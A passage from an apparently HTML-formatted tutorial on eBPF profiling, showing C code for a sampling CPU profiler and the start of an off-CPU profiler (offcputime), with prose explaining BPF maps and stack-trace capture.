&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;counts&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_HASH&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;u32&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;u8&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;MAX_PID_NR&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;pids&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_HASH&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;u32&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;u8&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;MAX_TID_NR&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;tids&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"perf_event"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;do_perf_event&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_perf_event_data&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;u64&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;valp&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="n"&gt;u64&lt;/span&gt; &lt;span class="n"&gt;zero&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;key_t&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{};&lt;/span&gt;
    &lt;span class="n"&gt;u64&lt;/span&gt; &lt;span class="n"&gt;id&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;u32&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;u32&lt;/span&gt; &lt;span class="n"&gt;tid&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_get_current_pid_tgid&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="n"&gt;pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;id&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;id&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;include_idle&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;filter_by_pid&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pids&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;filter_by_tid&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;tids&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;bpf_get_current_comm&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;user_stacks_only&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;kern_stack_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;else&lt;/span&gt;
        &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;kern_stack_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_get_stackid&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;regs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;stackmap&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;kernel_stacks_only&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;user_stack_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;else&lt;/span&gt;
        &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;user_stack_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_get_stackid&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;regs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;stackmap&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                            &lt;span class="n"&gt;BPF_F_USER_STACK&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="n"&gt;valp&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_map_lookup_or_try_init&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;counts&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;zero&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;valp&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;__sync_fetch_and_add&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;valp&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;LICENSE&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"license"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"GPL"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The program starts by defining several BPF maps. The &lt;code&gt;stackmap&lt;/code&gt; is a special map type for storing stack traces. When you call &lt;code&gt;bpf_get_stackid()&lt;/code&gt;, the kernel walks the stack and stores the instruction pointers in this map, returning an ID you can use to look it up later. The &lt;code&gt;counts&lt;/code&gt; map aggregates samples by a composite key that includes both the process ID and the stack IDs. The &lt;code&gt;pids&lt;/code&gt; and &lt;code&gt;tids&lt;/code&gt; maps act as filters, letting you restrict profiling to specific processes or threads.&lt;/p&gt;

&lt;p&gt;The main logic lives in the &lt;code&gt;do_perf_event()&lt;/code&gt; function, which runs every time a perf event fires. The user space program sets up these perf events at a specific frequency (default 49 Hz), one per CPU core. When a CPU triggers its timer, this function executes on whatever process happens to be running at that moment. It first extracts the process and thread IDs from the current task, then applies any configured filters. If the current thread should be sampled, it builds a key structure that includes the process name and stack traces.&lt;/p&gt;

&lt;p&gt;The two calls to &lt;code&gt;bpf_get_stackid()&lt;/code&gt; capture different pieces of the execution context. The first call without flags gets the kernel stack, showing what kernel functions were active. The second call with &lt;code&gt;BPF_F_USER_STACK&lt;/code&gt; gets the user space stack, showing your application's function calls. These stack IDs go into the key, and the program increments a counter for that unique combination. Over time, hot code paths get sampled more frequently, building up higher counts.&lt;/p&gt;

&lt;h3&gt;
  
  
  Off-CPU Profiling with offcputime
&lt;/h3&gt;

&lt;p&gt;The off-CPU profiler hooks into the scheduler to measure blocking time. Here's the complete eBPF program:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="c1"&gt;// SPDX-License-Identifier: GPL-2.0&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;vmlinux.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_helpers.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_core_read.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_tracing.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;"offcputime.h"&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="cp"&gt;#define PF_KTHREAD      0x00200000
&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="n"&gt;kernel_threads_only&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;false&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="n"&gt;user_threads_only&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;false&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="n"&gt;__u64&lt;/span&gt; &lt;span class="n"&gt;max_block_ns&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="n"&gt;__u64&lt;/span&gt; &lt;span class="n"&gt;min_block_ns&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="n"&gt;filter_by_tgid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;false&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="n"&gt;filter_by_pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;false&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="n"&gt;state&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;internal_key&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;u64&lt;/span&gt; &lt;span class="n"&gt;start_ts&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;key_t&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_HASH&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;u32&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;internal_key&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;MAX_ENTRIES&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;start&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_STACK_TRACE&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key_size&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;u32&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;stackmap&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_HASH&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;key_t&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;val_t&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;MAX_ENTRIES&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;info&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="nf"&gt;allow_record&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;task_struct&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;u32&lt;/span&gt; &lt;span class="n"&gt;tgid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;BPF_CORE_READ&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;tgid&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;u32&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;BPF_CORE_READ&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;filter_by_tgid&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;tgids&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;tgid&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nb"&gt;false&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;filter_by_pid&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pids&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nb"&gt;false&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;user_threads_only&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;BPF_CORE_READ&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;flags&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;PF_KTHREAD&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nb"&gt;false&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;kernel_threads_only&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;BPF_CORE_READ&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;flags&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;PF_KTHREAD&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nb"&gt;false&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
